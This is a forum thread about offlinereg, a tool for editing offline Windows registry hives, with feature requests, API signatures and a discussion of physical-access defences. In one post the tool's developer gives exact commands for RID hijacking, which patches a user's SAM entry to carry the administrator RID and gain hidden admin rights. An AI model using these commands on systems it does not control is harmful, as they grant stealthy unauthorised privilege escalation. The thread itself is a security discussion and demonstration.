Jump to content











Photo
- - - - -

offlinereg


  • Please log in to reply
281 replies to this topic

#276 osfixer

osfixer

    Member

  • Members
  • 31 posts
  •  
    United Kingdom

Posted A week ago

You forgot to fix this one. Leftovers. 
Edit: It seems to work fine. 

 

Also reg.exe cannot be a replacement because it doesn't ignore permissions. 


Edited by osfixer, 6 days ago.


#277 osfixer

osfixer

    Member

  • Members
  • 31 posts
  •  
    United Kingdom

Posted 5 days ago

What you could do also is add support for adjusting permissions.. for keys, values. 

This could be done only through command line I think. 

 

Does offlinereg respect inherited user? If process is launched with SYSTEM or TI token?

If it doesn't you can add /inherit switch..

DWORD
ORAPI
ORGetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
_Inout_ PDWORD lpcbSecurityDescriptor
);

DWORD
ORAPI
ORSetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ PSECURITY_DESCRIPTOR pSecurityDescriptor
);

Edited by osfixer, 4 days ago.


#278 erwan.l

erwan.l

    Gold Member

  • Developer
  • 2471 posts
  • Location:Nantes - France
  •  
    France

Posted 48 minutes ago

Following a post here on how to blank an account's password using offlinereg, this time, lets see how to perform RID hijacking.

The local admin account has a 01F4 rid.
What about "patching" another account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite "stealthy" as the account will still not be part of the local admin group while being to perform admin tasks.

LSASS trust SAMRV and SAMSRV trust the registry.

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.



#279 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14615 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 26 minutes ago

This can work with the guest account as well.


Nice :)

And once again all it can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it



#280 erwan.l

erwan.l

    Gold Member

  • Developer
  • 2471 posts
  • Location:Nantes - France
  •  
    France

Posted 16 minutes ago

Nice :)

And once again all it can be used to preent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it

 

Absolutely agree.

 

Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type the bios password but is perfectly valid in a home environement.

 

Disk encryption like bitlocker adresses a lot of these "local" attacks although I feel bitlocker could shortly be broken without even having to get the key from the TPM chip...



#281 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14615 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 9 minutes ago

Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type this password but is perfectly valid in a home environement.

 

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.



#282 erwan.l

erwan.l

    Gold Member

  • Developer
  • 2471 posts
  • Location:Nantes - France
  •  
    France

Posted A minute ago

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.

 

I work in a big corp environement and it is alreay a PITA to enforce usernames which are vaguely connect the actualy user name (2 letters for country code, 1 letter for division, 2 letters for first name, 2 letter for last name) and then a 8+ password characters which has to include digits AND non alpha num chars.

 

That only is enough to keep dozens ot IT ppl busy every day :)

I can see the massive nervous breakdown it would be if we were to ask to remember the computer BIOS password.

 

Now, on a good side, in big corp environements, SSO makes is so that the user normally should only have to remember his unique LDAP credentials - with one major pitfall thus : if the user credentials gets compromised, all apps get compromised...

 

Security is a never ending discussion.

I like to play the red team sec guy - I really would not want to be a blue team sec guy :)






4 user(s) are reading this topic

2 members, 2 guests, 0 anonymous users


    erwan.l, osfixer